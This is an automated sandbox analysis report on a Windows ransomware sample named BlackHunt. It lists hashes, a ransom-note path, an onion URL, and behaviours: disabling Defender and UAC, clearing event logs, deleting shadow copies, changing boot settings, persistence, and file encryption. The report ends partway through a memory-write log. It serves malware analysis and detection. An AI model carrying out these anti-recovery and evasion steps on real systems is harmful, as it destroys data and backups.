Analysis
-
max time kernel
130s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:54
Static task
static1
Behavioral task
behavioral1
Sample
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Resource
win10v2004-20231215-en
General
-
Target
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
-
Size
707KB
-
MD5
050c63191280ddb539b8175a7638828a
-
SHA1
95d84dc1722a532d05190d5a39e1164c992ea098
-
SHA256
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb
-
SHA512
1917817ca31a04b98f0ff90f79f4dd8984410287849ecc43c096b89a0df176f01a092c407f9bdf0d1280394186fdd419930da9fd0640296f3d78476ab31186a4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1x8Evnh:6uaTmkZJ+naie5OTamgEoKxLWk6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3008 fsutil.exe 3280 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1080 wevtutil.exe 988 wevtutil.exe 3708 wevtutil.exe 3836 wevtutil.exe 3476 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2796 bcdedit.exe 2580 bcdedit.exe 1776 bcdedit.exe 2188 bcdedit.exe -
Renames multiple (2312) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2724 wbadmin.exe 1936 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3088 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\R: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\G: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\B: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\M: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\I: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\P: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\K: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\V: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Q: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Y: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\O: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\T: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\X: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\W: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\U: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\H: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\J: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\N: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\L: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Z: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Google\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\License.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\Common.fxh 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3040 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1808 vssadmin.exe 2280 vssadmin.exe 2644 vssadmin.exe 1136 vssadmin.exe 1236 vssadmin.exe 3068 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1852 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3848 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2744 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeRestorePrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeBackupPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeTakeOwnershipPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeAuditPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeSecurityPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeIncBasePriorityPrivilege 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeBackupPrivilege 1732 vssvc.exe Token: SeRestorePrivilege 1732 vssvc.exe Token: SeAuditPrivilege 1732 vssvc.exe Token: SeBackupPrivilege 2492 wbengine.exe Token: SeRestorePrivilege 2492 wbengine.exe Token: SeSecurityPrivilege 2492 wbengine.exe Token: SeSecurityPrivilege 988 wevtutil.exe Token: SeBackupPrivilege 988 wevtutil.exe Token: SeSecurityPrivilege 3708 wevtutil.exe Token: SeBackupPrivilege 3708 wevtutil.exe Token: SeSecurityPrivilege 3836 wevtutil.exe Token: SeSecurityPrivilege 3476 wevtutil.exe Token: SeBackupPrivilege 3836 wevtutil.exe Token: SeBackupPrivilege 3476 wevtutil.exe Token: SeSecurityPrivilege 1080 wevtutil.exe Token: SeBackupPrivilege 1080 wevtutil.exe Token: SeDebugPrivilege 1852 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2984 wrote to memory of 2820 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 29 PID 2984 wrote to memory of 2820 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 29 PID 2984 wrote to memory of 2820 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 29 PID 2984 wrote to memory of 2820 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 29 PID 2984 wrote to memory of 2716 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 31 PID 2984 wrote to memory of 2716 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 31 PID 2984 wrote to memory of 2716 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 31 PID 2984 wrote to memory of 2716 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 31 PID 2984 wrote to memory of 2668 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 32 PID 2984 wrote to memory of 2668 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 32 PID 2984 wrote to memory of 2668 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 32 PID 2984 wrote to memory of 2668 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 32 PID 2984 wrote to memory of 2696 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 35 PID 2984 wrote to memory of 2696 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 35 PID 2984 wrote to memory of 2696 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 35 PID 2984 wrote to memory of 2696 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 35 PID 2984 wrote to memory of 2572 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 36 PID 2984 wrote to memory of 2572 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 36 PID 2984 wrote to memory of 2572 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 36 PID 2984 wrote to memory of 2572 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 36 PID 2984 wrote to memory of 2664 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 39 PID 2984 wrote to memory of 2664 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 39 PID 2984 wrote to memory of 2664 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 39 PID 2984 wrote to memory of 2664 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 39 PID 2984 wrote to memory of 2744 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 40 PID 2984 wrote to memory of 2744 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 40 PID 2984 wrote to memory of 2744 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 40 PID 2984 wrote to memory of 2744 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 40 PID 2984 wrote to memory of 2228 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 41 PID 2984 wrote to memory of 2228 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 41 PID 2984 wrote to memory of 2228 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 41 PID 2984 wrote to memory of 2228 2984 